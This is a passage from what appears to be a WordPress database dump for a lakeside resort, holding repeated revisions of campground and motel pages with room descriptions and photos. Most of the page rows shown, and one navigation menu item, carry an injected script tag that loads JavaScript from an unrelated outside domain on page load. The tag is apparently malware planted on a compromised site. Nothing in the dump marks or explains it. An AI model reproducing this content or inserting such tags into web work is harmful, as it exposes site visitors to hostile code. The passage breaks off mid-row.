src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3876-1024x768.jpg\" sizes=\"(max-width: 720px) 100vw, 720px\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3876-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3876-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3876-768x576.jpg 768w\" alt=\"\" width=\"720\" height=\"540\" /><figcaption>THERE ARE FULL HOOK UP 30 AMP SITES</figcaption></figure>\r\n<figure><img src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3873-1024x768.jpg\" sizes=\"(max-width: 720px) 100vw, 720px\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3873-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3873-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3873-768x576.jpg 768w\" alt=\"\" width=\"720\" height=\"540\" /><figcaption>20 AMP SITES</figcaption></figure>\r\n<img src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3874-1024x768.jpg\" sizes=\"(max-width: 720px) 100vw, 720px\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3874-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3874-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3874-768x576.jpg 768w\" alt=\"\" width=\"720\" height=\"540\" />\r\n<figure><img src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3881-1024x768.jpg\" sizes=\"(max-width: 720px) 100vw, 720px\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3881-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3881-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3881-768x576.jpg 768w\" alt=\"\" width=\"720\" height=\"540\" /><figcaption>TENTING NO ELECTRIC SITES</figcaption></figure>\r\n<img src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3879-1024x768.jpg\" sizes=\"(max-width: 720px) 100vw, 720px\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3879-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3879-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3879-768x576.jpg 768w\" alt=\"\" width=\"720\" height=\"540\" />\r\n\r\nThere is also a free shower house and dump station at the resort. Each site comes with a picnic table and most have fire ring.<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Campgrounds','','inherit','closed','closed','','633-revision-v1','','','2018-03-09 20:43:39','2018-03-10 02:43:39','',633,'http://ashbyresort.com/633-revision-v1/',0,'revision','',0),(639,1,'2018-03-09 20:44:08','2018-03-10 02:44:08',' <script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','','','publish','closed','closed','','639','','','2019-06-16 20:42:00','2019-06-17 01:42:00','',0,'http://ashbyresort.com/?p=639',5,'nav_menu_item','',0),(642,1,'2018-03-09 21:27:47','2018-03-10 03:27:47','<p><strong> Stay in a Motel Room – </strong><strong><a href=\"http://ashbyresort.com/calendar/\">Call us at 218-747-2959 to book it</a>  <br /></strong></p><p><strong>All motel rooms are available nightly, weekly and long term.</strong></p><p><strong>We have motel units with kitchens “Kitchenettes”<br /> and we have units without kitchens “Sleepers”.<br />or our lakeside Villa.<br /></strong></p><p>All units are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets.</p>		\n		<img src=\"http://ashbyresort.com/wp-content/uploads/elementor/thumbs/Motel-nmume2smns5ffovkxru2cs4ty7s5as7g50hos13b20.jpg\" title=\"Motel\" alt=\"Motel\" />		\n		<p><strong>Kitchenettes #1, 3, 5 &amp; 7</strong></p><p>Are 1 bedroom – 1 bathroom with 2 double beds Maximum people 4</p><p>also included in a Kitchenette unit is:<br /> A Stove (Ovens in #3 &amp; 7 only), microwave, refrigerator, coffee maker, toaster, pots, pans, dishes, TV and airconditioning</p>		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4149-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4149-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4149-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4149-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<p><strong>Sleepers #2, #4 and #6</strong></p><p>Are one bedroom – 1 bathroom and 1 Double Bed with a hide a bed sofa in the main living area.<br /> Maximum people 4.</p>		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42011-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42011-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42011-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42011-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN41971-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN41971-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN41971-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN41971-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42001-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42001-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42001-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42001-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<p><strong>Lakeside Villa #9</strong></p><p>Unit # 9 is one of the most popular units newly remodeled in 2015<br /> #9 has one Queen bed, and two single beds one bathroom<br />Maximum people 4. No pets. No Smoking.</p>		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4157-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4157-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4157-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4157-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4155-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4155-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4155-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4155-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" /><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Motel','','inherit','closed','closed','','46-revision-v1','','','2018-03-09 21:27:47','2018-03-10 03:27:47','',46,'http://ashbyresort.com/46-revision-v1/',0,'revision','',0),(643,1,'2018-03-09 21:30:09','2018-03-10 03:30:09','<p><strong> Stay in a Motel Room – </strong><strong><a href=\"http://ashbyresort.com/calendar/\">Call us at 218-747-2959 to book it</a>  <br /></strong></p><p><strong>All motel rooms are available nightly, weekly and long term.</strong></p><p><strong>We have motel units with kitchens “Kitchenettes”<br /> and we have units without kitchens “Sleepers”.<br />or our lakeside Villa.<br /></strong></p><p>All units are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets.</p>		\n		<img src=\"http://ashbyresort.com/wp-content/uploads/elementor/thumbs/Motel-nmume2smns5ffovkxru2cs4ty7s5as7g50hos13b20.jpg\" title=\"Motel\" alt=\"Motel\" />		\n		<p><strong>Kitchenettes #1, 3, 5 &amp; 7</strong></p><p>Are 1 bedroom – 1 bathroom with 2 double beds Maximum people 4</p><p>also included in a Kitchenette unit is:<br /> A Stove (Ovens in #3 &amp; 7 only), microwave, refrigerator, coffee maker, toaster, pots, pans, dishes, TV and airconditioning</p>		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4149-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4149-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4149-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4149-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<p><strong>Sleepers #2, #4 and #6</strong></p><p>Are one bedroom – 1 bathroom and 1 Double Bed with a hide a bed sofa in the main living area.<br /> Maximum people 4.</p>		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42011-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42011-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42011-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42011-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN41971-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN41971-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN41971-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN41971-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42001-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42001-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42001-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42001-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<p><strong>Lakeside Villa #9</strong></p><p>Unit # 9 is one of the most popular units newly remodeled in 2015<br /> #9 has one Queen bed, and two single beds one bathroom<br />Maximum people 4. No pets. No Smoking.</p>		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4157-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4157-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4157-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4157-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4155-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4155-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4155-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4155-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" /><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Motel','','inherit','closed','closed','','46-revision-v1','','','2018-03-09 21:30:09','2018-03-10 03:30:09','',46,'http://ashbyresort.com/46-revision-v1/',0,'revision','',0),(644,1,'2018-03-09 21:30:29','2018-03-10 03:30:29','<p><strong> Stay in a Motel Room – </strong><strong><a href=\"http://ashbyresort.com/calendar/\">Call us at 218-747-2959 to book it</a>  <br /></strong></p><p><strong>All motel rooms are available nightly, weekly and long term.</strong></p><p><strong>We have motel units with kitchens “Kitchenettes”<br /> and we have units without kitchens “Sleepers”.<br />or our lakeside Villa.<br /></strong></p><p>All units are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets.</p>		\n		<img src=\"http://ashbyresort.com/wp-content/uploads/elementor/thumbs/Motel-nmume2smns5ffovkxru2cs4ty7s5as7g50hos13b20.jpg\" title=\"Motel\" alt=\"Motel\" />		\n		<p><strong>Kitchenettes #1, 3, 5 &amp; 7</strong></p><p>Are 1 bedroom – 1 bathroom with 2 double beds Maximum people 4</p><p>also included in a Kitchenette unit is:<br /> A Stove (Ovens in #3 &amp; 7 only), microwave, refrigerator, coffee maker, toaster, pots, pans, dishes, TV and airconditioning</p>		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4149-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4149-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4149-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4149-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<p><strong>Sleepers #2, #4 and #6</strong></p><p>Are one bedroom – 1 bathroom and 1 Double Bed with a hide a bed sofa in the main living area.<br /> Maximum people 4.</p>		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42011-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42011-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42011-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42011-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN41971-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN41971-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN41971-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN41971-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42001-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42001-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42001-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42001-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<p><strong>Lakeside Villa #9</strong></p><p>Unit # 9 is one of the most popular units newly remodeled in 2015<br /> #9 has one Queen bed, and two single beds one bathroom<br />Maximum people 4. No pets. No Smoking.</p>		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4157-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4157-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4157-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4157-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4155-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4155-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4155-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4155-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" /><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Motel','','inherit','closed','closed','','46-revision-v1','','','2018-03-09 21:30:29','2018-03-10 03:30:29','',46,'http://ashbyresort.com/46-revision-v1/',0,'revision','',0),(645,1,'2018-03-09 21:31:24','2018-03-10 03:31:24','<p><strong> Stay in a Motel Room – </strong><strong><a href=\"http://ashbyresort.com/calendar/\">Call us at 218-747-2959 to book it</a>  <br /></strong></p><p><strong>All motel rooms are available nightly, weekly and long term.</strong></p><p><strong>We have motel units with kitchens “Kitchenettes”<br /> and we have units without kitchens “Sleepers”.<br />or our lakeside Villa.<br /></strong></p><p>All units are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets.</p>		\n		<img src=\"http://ashbyresort.com/wp-content/uploads/elementor/thumbs/Motel-nmume2smns5ffovkxru2cs4ty7s5as7g50hos13b20.jpg\" title=\"Motel\" alt=\"Motel\" />		\n		<p><strong>Kitchenettes #1, 3, 5 &amp; 7</strong></p><p>Are 1 bedroom – 1 bathroom with 2 double beds Maximum people 4</p><p>also included in a Kitchenette unit is:<br /> A Stove (Ovens in #3 &amp; 7 only), microwave, refrigerator, coffee maker, toaster, pots, pans, dishes, TV and airconditioning</p>		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4149-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4149-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4149-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4149-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<p><strong>Sleepers #2, #4 and #6</strong></p><p>Are one bedroom – 1 bathroom and 1 Double Bed with a hide a bed sofa in the main living area.<br /> Maximum people 4.</p>		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42011-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42011-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42011-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42011-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN41971-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN41971-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN41971-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN41971-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42001-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42001-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42001-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42001-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<p><strong>Lakeside Villa #9</strong></p><p>Unit # 9 is one of the most popular units newly remodeled in 2015<br /> #9 has one Queen bed, and two single beds one bathroom<br />Maximum people 4. No pets. No Smoking.</p>		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4157-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4157-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4157-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4157-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4155-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4155-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4155-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4155-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" /><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Motel','','inherit','closed','closed','','46-revision-v1','','','2018-03-09 21:31:24','2018-03-10 03:31:24','',46,'http://ashbyresort.com/46-revision-v1/',0,'revision','',0),(646,1,'2018-03-09 21:32:54','2018-03-10 03:32:54','<p><strong> Stay in a Motel Room – </strong><strong><a href=\"http://ashbyresort.com/calendar/\">Call us at 218-747-2959 to book it</a>  <br /></strong></p><p><strong>All motel rooms are available nightly, weekly and long term.</strong></p><p><strong>We have motel units with kitchens “Kitchenettes”<br /> and we have units without kitchens “Sleepers”.<br />or our lakeside Villa.<br /></strong></p><p>All units are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets.</p>		\n		<img src=\"http://ashbyresort.com/wp-content/uploads/elementor/thumbs/Motel-nmume2smns5ffovkxru2cs4ty7s5as7g50hos13b20.jpg\" title=\"Motel\" alt=\"Motel\" />		\n		<p><strong>Kitchenettes #1, 3, 5 &amp; 7</strong></p><p>Are 1 bedroom – 1 bathroom with 2 double beds Maximum people 4</p><p>also included in a Kitchenette unit is:<br /> A Stove (Ovens in #3 &amp; 7 only), microwave, refrigerator, coffee maker, toaster, pots, pans, dishes, TV and airconditioning</p>		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4149-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4149-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4149-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4149-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<p><strong>Sleepers #2, #4 and #6</strong></p><p>Are one bedroom – 1 bathroom and 1 Double Bed with a hide a bed sofa in the main living area.<br /> Maximum people 4.</p>		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42011-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42011-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42011-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42011-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN41971-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN41971-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN41971-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN41971-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42001-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42001-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42001-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42001-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<p><strong>Lakeside Villa #9</strong></p><p>Unit # 9 is one of the most popular units newly remodeled in 2015<br /> #9 has one Queen bed, and two single beds one bathroom<br />Maximum people 4. No pets. No Smoking.</p>		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4157-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4157-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4157-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4157-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4155-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4155-1024x768.jpg 1024w, 